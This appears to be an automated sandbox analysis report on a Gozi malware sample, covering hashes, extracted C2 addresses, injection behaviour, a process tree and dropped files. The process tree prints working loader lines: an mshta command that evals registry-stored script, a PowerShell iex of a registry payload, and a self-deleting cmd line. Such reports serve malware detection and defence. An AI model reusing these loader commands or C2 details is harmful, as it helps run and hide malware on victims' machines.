Analysis
-
max time kernel
152s -
max time network
154s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
04-10-2023 17:55
Static task
static1
Behavioral task
behavioral1
Sample
5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2_JC.exe
Resource
win7-20230831-en
General
-
Target
5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2_JC.exe
-
Size
294KB
-
MD5
bb35f8c1a3236ad31c754cdfe795d57f
-
SHA1
b744f8ae31e2b3f7c3b72b9615823a3a3ad02989
-
SHA256
5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2
-
SHA512
fcb8f4458b7a5a4a2536a22ad55e4564ffe3d3327e4eefca10a30bc490ae29c8cc31760e07d567de53150090c84bb171209f1f3811f22d3f69545beb15edd0b0
-
SSDEEP
3072:4e6lIjmvg7aaCIg0JHk8D8uNhUqHAMMQKL2H/NHIS:4blIavYaaCIg6h/NhUDAHlH
Malware Config
Extracted
gozi
Extracted
gozi
5050
185.247.184.139
62.72.33.155
incontroler.com
-
base_path
/jerry/
-
build
250260
-
exe_type
loader
-
extension
.bob
-
server_id
50
Extracted
gozi
5050
mifrutty.com
systemcheck.top
-
base_path
/pictures/
-
build
250260
-
exe_type
worker
-
extension
.bob
-
server_id
50
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1045988481-1457812719-2617974652-1000\Control Panel\International\Geo\Nation mshta.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exedescription pid process target process PID 2880 set thread context of 2660 2880 powershell.exe Explorer.EXE PID 2660 set thread context of 3692 2660 Explorer.EXE RuntimeBroker.exe PID 2660 set thread context of 3976 2660 Explorer.EXE RuntimeBroker.exe PID 2660 set thread context of 2332 2660 Explorer.EXE cmd.exe PID 2660 set thread context of 4760 2660 Explorer.EXE RuntimeBroker.exe PID 2660 set thread context of 1680 2660 Explorer.EXE RuntimeBroker.exe PID 2660 set thread context of 3528 2660 Explorer.EXE cmd.exe PID 2332 set thread context of 1844 2332 cmd.exe PING.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1076 4172 WerFault.exe 5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2_JC.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
PING.EXEpid process 1844 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2_JC.exepowershell.exeExplorer.EXEpid process 4172 5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2_JC.exe 4172 5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2_JC.exe 2880 powershell.exe 2880 powershell.exe 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE -
Suspicious behavior: MapViewOfSection 8 IoCs
Processes:
powershell.exeExplorer.EXEcmd.exepid process 2880 powershell.exe 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2660 Explorer.EXE 2332 cmd.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exeExplorer.EXEdescription pid process Token: SeDebugPrivilege 2880 powershell.exe Token: SeShutdownPrivilege 2660 Explorer.EXE Token: SeCreatePagefilePrivilege 2660 Explorer.EXE Token: SeShutdownPrivilege 2660 Explorer.EXE Token: SeCreatePagefilePrivilege 2660 Explorer.EXE Token: SeShutdownPrivilege 2660 Explorer.EXE Token: SeCreatePagefilePrivilege 2660 Explorer.EXE Token: SeShutdownPrivilege 2660 Explorer.EXE Token: SeCreatePagefilePrivilege 2660 Explorer.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Explorer.EXEpid process 2660 Explorer.EXE -
Suspicious use of WriteProcessMemory 46 IoCs
Processes:
mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exedescription pid process target process PID 2164 wrote to memory of 2880 2164 mshta.exe powershell.exe PID 2164 wrote to memory of 2880 2164 mshta.exe powershell.exe PID 2880 wrote to memory of 4112 2880 powershell.exe csc.exe PID 2880 wrote to memory of 4112 2880 powershell.exe csc.exe PID 4112 wrote to memory of 3300 4112 csc.exe cvtres.exe PID 4112 wrote to memory of 3300 4112 csc.exe cvtres.exe PID 2880 wrote to memory of 3796 2880 powershell.exe csc.exe PID 2880 wrote to memory of 3796 2880 powershell.exe csc.exe PID 3796 wrote to memory of 3420 3796 csc.exe cvtres.exe PID 3796 wrote to memory of 3420 3796 csc.exe cvtres.exe PID 2880 wrote to memory of 2660 2880 powershell.exe Explorer.EXE PID 2880 wrote to memory of 2660 2880 powershell.exe Explorer.EXE PID 2880 wrote to memory of 2660 2880 powershell.exe Explorer.EXE PID 2880 wrote to memory of 2660 2880 powershell.exe Explorer.EXE PID 2660 wrote to memory of 3692 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 3692 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 3692 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 3692 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 3976 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 3976 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 2332 2660 Explorer.EXE cmd.exe PID 2660 wrote to memory of 2332 2660 Explorer.EXE cmd.exe PID 2660 wrote to memory of 2332 2660 Explorer.EXE cmd.exe PID 2660 wrote to memory of 3976 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 3976 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 4760 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 4760 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 2332 2660 Explorer.EXE cmd.exe PID 2660 wrote to memory of 4760 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 4760 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 1680 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 1680 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 2332 2660 Explorer.EXE cmd.exe PID 2660 wrote to memory of 1680 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 1680 2660 Explorer.EXE RuntimeBroker.exe PID 2660 wrote to memory of 3528 2660 Explorer.EXE cmd.exe PID 2660 wrote to memory of 3528 2660 Explorer.EXE cmd.exe PID 2660 wrote to memory of 3528 2660 Explorer.EXE cmd.exe PID 2660 wrote to memory of 3528 2660 Explorer.EXE cmd.exe PID 2332 wrote to memory of 1844 2332 cmd.exe PING.EXE PID 2332 wrote to memory of 1844 2332 cmd.exe PING.EXE PID 2332 wrote to memory of 1844 2332 cmd.exe PING.EXE PID 2660 wrote to memory of 3528 2660 Explorer.EXE cmd.exe PID 2660 wrote to memory of 3528 2660 Explorer.EXE cmd.exe PID 2332 wrote to memory of 1844 2332 cmd.exe PING.EXE PID 2332 wrote to memory of 1844 2332 cmd.exe PING.EXE
Processes
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4760
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3976
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3692
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2_JC.exe"C:\Users\Admin\AppData\Local\Temp\5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2_JC.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4172 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4172 -s 4723⤵
- Program crash
PID:1076 -
C:\Windows\System32\mshta.exe"C:\Windows\System32\mshta.exe" "about:<hta:application><script>W074='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(W074).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\5C68964F-0BE8-EE1D-7550-6F0279841356\\\MaskControl'));if(!window.flag)close()</script>"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2164 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name bgelmuwash -value gp; new-alias -name xggvmwfau -value iex; xggvmwfau ([System.Text.Encoding]::ASCII.GetString((bgelmuwash "HKCU:Software\AppDataLow\Software\Microsoft\5C68964F-0BE8-EE1D-7550-6F0279841356").PlaySystem))3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\d0njbnhj\d0njbnhj.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:4112 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9512.tmp" "c:\Users\Admin\AppData\Local\Temp\d0njbnhj\CSC919465A5552C4193B9B84012C21B277C.TMP"5⤵PID:3300
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\3hxlwqvp\3hxlwqvp.cmdline"4⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES967A.tmp" "c:\Users\Admin\AppData\Local\Temp\3hxlwqvp\CSCC1423BA672642068DD9332E0276836.TMP"5⤵PID:3420
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\5cd96f6b1e6a4a172d852a7bcf5ad10bf029e135061f0ae5105f45a9920089a2_JC.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\system32\PING.EXEping localhost -n 53⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1844 -
C:\Windows\syswow64\cmd.exe"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,2⤵PID:3528
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:1680
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4172 -ip 41721⤵PID:1304
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\3hxlwqvp\3hxlwqvp.dllFilesize
3KB
MD5363e71d6c6d7563960f0535b0f1afd63
SHA10f9c8d3ba244c543dcb8adda353efdd298c8781f
SHA25690e5590ed6273771f53e6d5d95f7e45dab4c0bf513a7a1d01cd5cb128ab8d1aa
SHA5123b88805b60021e506d80f1da695e076018a1334d5f092378831f64740680507163f3310de48f2a5f7c819582bab9dd9f8de035d8d213b6a648020f0bea0d67d5
-
C:\Users\Admin\AppData\Local\Temp\RES9512.tmpFilesize
1KB
MD5621779181e88af3ff1d3bab481b0a830
SHA185f35cbbebf0bec83ec622074fc0fac0c01bed1a
SHA2568b1c1b73426667b4af0b64110f5c1ca71ba7b2ee2c94ceee28a3b463dd24acf6
SHA5128c62caafadad7e41ae1e54d0ff06cad94fb29201ee42c537317d75d30c54747a6a644f5a646b45925a2144fc121699cda92d32f3cbf3c9fae34424ad9cb5181c
-
C:\Users\Admin\AppData\Local\Temp\RES967A.tmpFilesize
1KB
MD554123c076d75d33db3c9d0a3e25a64f6
SHA1df43736b86d5f8a22cd6c6d3d1b7b5cbb824ed2a
SHA2563607466921e7a0375ebac019b2948e6cc0deaa36ddb53f4c5da7c7a9c12b1b2d
SHA512880fb7afacafed6d5938d31c53ff677daddfe8b5ddbaf6ced4aaece6004c2d608932b553fe7590970f13a6d4fa1a388ed62ad9eefbadcb28ec79ef98a720a02a
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5hbzh2z.iin.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\d0njbnhj\d0njbnhj.dllFilesize
3KB
MD53f7c5874bcec24af9b6b25b6b966f26c
SHA19094b5a0f718fd2c5edec194431dccba78f527cf
SHA256ed779f574828cf207b128da970553156bf26f1a87f72741dd62f8002bd560ae8
SHA512e06a486fcfab22521b2e3fbd6bed1538af19d25e2f4a803df5af44215fc5d48ebecf99528738a17858297cf550ba16ca3e384bcf8066a8c07337bfe54de5cbc2
-
\??\c:\Users\Admin\AppData\Local\Temp\3hxlwqvp\3hxlwqvp.0.csFilesize
406B
MD5ca8887eacd573690830f71efaf282712
SHA10acd4f49fc8cf6372950792402ec3aeb68569ef8
SHA256568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3
SHA5122a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7
-
\??\c:\Users\Admin\AppData\Local\Temp\3hxlwqvp\3hxlwqvp.cmdlineFilesize
369B
MD5a8e35f381e213a4731091d06bfa35656
SHA1b0b395d50b4519fea22adea4cafd53d87af40882
SHA2566059f7c8885d78ff1e138c53ebb665bbfd7d455e3cae7381613ee05915022ba0
SHA512de615625fbf242211553652ceed9fa97e53235e645b69e3f34f7f92fc63f216a77770f71762f8baf3229b00faf1bf5461430e820be0d86080f60be45b061b126
-
\??\c:\Users\Admin\AppData\Local\Temp\3hxlwqvp\CSCC1423BA672642068DD9332E0276836.TMPFilesize
652B
MD5d8e918ddc7690f674ab4e653c50af3dd
SHA1c0aeae925a53b43ddd7d21ea547508a9e59677e0
SHA256c2e4c0d31d038cc43123ca29d8c1d784589493e7d98c7d1b483a36626e0fbf9f
SHA5121c241a439a3f8ea09f71a9bcd5fef8e2eac441f618064ffbf38eef501b86e7a524c4f5d096e0fd2ef01e7483609e2c1fd7ec30fe0c311861c60504dcf0c3cd6c
-
\??\c:\Users\Admin\AppData\Local\Temp\d0njbnhj\CSC919465A5552C4193B9B84012C21B277C.TMPFilesize
652B
MD5f8692d0919c49a507586d1e986f914f2
SHA18a403f1598442d6bdf33b0048b010eed3b278e1d
SHA256f5c5fca28633d8c41685416de963286437f8f2c1b9d1a05e848daa3252fe10d6
SHA512b4ee1cefb4fa4f49141d4f943637d8758fac61da04cc36f41ce40f72205171e1ec53983062560392fc7af1d4c2d4d0538142c34808bad7e63e03c1c64a6b6876
-
\??\c:\Users\Admin\AppData\Local\Temp\d0njbnhj\d0njbnhj.0.csFilesize
405B
MD5caed0b2e2cebaecd1db50994e0c15272
SHA15dfac9382598e0ad2e700de4f833de155c9c65fa
SHA25621210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150
SHA51286dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62
-
\??\c:\Users\Admin\AppData\Local\Temp\d0njbnhj\d0njbnhj.cmdlineFilesize
369B
MD564388e5e68a9314c58ebb895e8474708
SHA1b1c7f5fcdda89b8120b3dc82f4bd627c1de9fd18
SHA256eaca179931910d0f5b9b234415b72ce5a87664592bdb71b95bbeacd742c6b769
SHA512b72ab23af0d4dab806b73d7cf83d4a0129bbc8a9a105476e2ccd3408be4f52def624bef3ae0fdadeb738028b44bafb6db206c08982433cb38625fd0f73adb081
-
memory/1680-107-0x0000018EB9370000-0x0000018EB9371000-memory.dmpFilesize
4KB
-
memory/1680-104-0x0000018EB9A40000-0x0000018EB9AE4000-memory.dmpFilesize
656KB
-
memory/1680-130-0x0000018EB9A40000-0x0000018EB9AE4000-memory.dmpFilesize
656KB
-
memory/1844-118-0x000001FCF6A00000-0x000001FCF6AA4000-memory.dmpFilesize
656KB
-
memory/1844-121-0x000001FCF6890000-0x000001FCF6891000-memory.dmpFilesize
4KB
-
memory/1844-129-0x000001FCF6A00000-0x000001FCF6AA4000-memory.dmpFilesize
656KB
-
memory/2332-96-0x0000018C7EC00000-0x0000018C7ECA4000-memory.dmpFilesize
656KB
-
memory/2332-100-0x0000018C7EA40000-0x0000018C7EA41000-memory.dmpFilesize
4KB
-
memory/2332-128-0x0000018C7EC00000-0x0000018C7ECA4000-memory.dmpFilesize
656KB
-
memory/2660-69-0x00000000029E0000-0x00000000029E1000-memory.dmpFilesize
4KB
-
memory/2660-68-0x00000000089F0000-0x0000000008A94000-memory.dmpFilesize
656KB
-
memory/2660-113-0x00000000089F0000-0x0000000008A94000-memory.dmpFilesize
656KB
-
memory/2880-34-0x0000020B401B0000-0x0000020B401C0000-memory.dmpFilesize
64KB
-
memory/2880-35-0x0000020B401B0000-0x0000020B401C0000-memory.dmpFilesize
64KB
-
memory/2880-64-0x0000020B40430000-0x0000020B40438000-memory.dmpFilesize
32KB
-
memory/2880-66-0x0000020B40670000-0x0000020B406AD000-memory.dmpFilesize
244KB
-
memory/2880-36-0x0000020B401B0000-0x0000020B401C0000-memory.dmpFilesize
64KB
-
memory/2880-79-0x00007FFE206D0000-0x00007FFE21191000-memory.dmpFilesize
10.8MB
-
memory/2880-80-0x0000020B40670000-0x0000020B406AD000-memory.dmpFilesize
244KB
-
memory/2880-50-0x0000020B40170000-0x0000020B40178000-memory.dmpFilesize
32KB
-
memory/2880-28-0x0000020B40180000-0x0000020B401A2000-memory.dmpFilesize
136KB
-
memory/2880-33-0x00007FFE206D0000-0x00007FFE21191000-memory.dmpFilesize
10.8MB
-
memory/3528-124-0x0000000001400000-0x0000000001498000-memory.dmpFilesize
608KB
-
memory/3528-115-0x0000000000F60000-0x0000000000F61000-memory.dmpFilesize
4KB
-
memory/3528-112-0x0000000001400000-0x0000000001498000-memory.dmpFilesize
608KB
-
memory/3692-83-0x000001E2E6740000-0x000001E2E6741000-memory.dmpFilesize
4KB
-
memory/3692-82-0x000001E2E6D00000-0x000001E2E6DA4000-memory.dmpFilesize
656KB
-
memory/3692-119-0x000001E2E6D00000-0x000001E2E6DA4000-memory.dmpFilesize
656KB
-
memory/3976-88-0x00000205C8500000-0x00000205C85A4000-memory.dmpFilesize
656KB
-
memory/3976-89-0x00000205C84C0000-0x00000205C84C1000-memory.dmpFilesize
4KB
-
memory/3976-125-0x00000205C8500000-0x00000205C85A4000-memory.dmpFilesize
656KB
-
memory/4172-5-0x0000000000400000-0x0000000002290000-memory.dmpFilesize
30.6MB
-
memory/4172-7-0x0000000004010000-0x000000000401D000-memory.dmpFilesize
52KB
-
memory/4172-6-0x0000000003E90000-0x0000000003E9B000-memory.dmpFilesize
44KB
-
memory/4172-10-0x0000000000400000-0x0000000002290000-memory.dmpFilesize
30.6MB
-
memory/4172-1-0x00000000023B0000-0x00000000024B0000-memory.dmpFilesize
1024KB
-
memory/4172-126-0x0000000000400000-0x0000000002290000-memory.dmpFilesize
30.6MB
-
memory/4172-4-0x00000000023B0000-0x00000000024B0000-memory.dmpFilesize
1024KB
-
memory/4172-3-0x0000000000400000-0x0000000002290000-memory.dmpFilesize
30.6MB
-
memory/4172-2-0x0000000003E90000-0x0000000003E9B000-memory.dmpFilesize
44KB
-
memory/4760-95-0x000001CF05810000-0x000001CF058B4000-memory.dmpFilesize
656KB
-
memory/4760-97-0x000001CF04FB0000-0x000001CF04FB1000-memory.dmpFilesize
4KB
-
memory/4760-127-0x000001CF05810000-0x000001CF058B4000-memory.dmpFilesize
656KB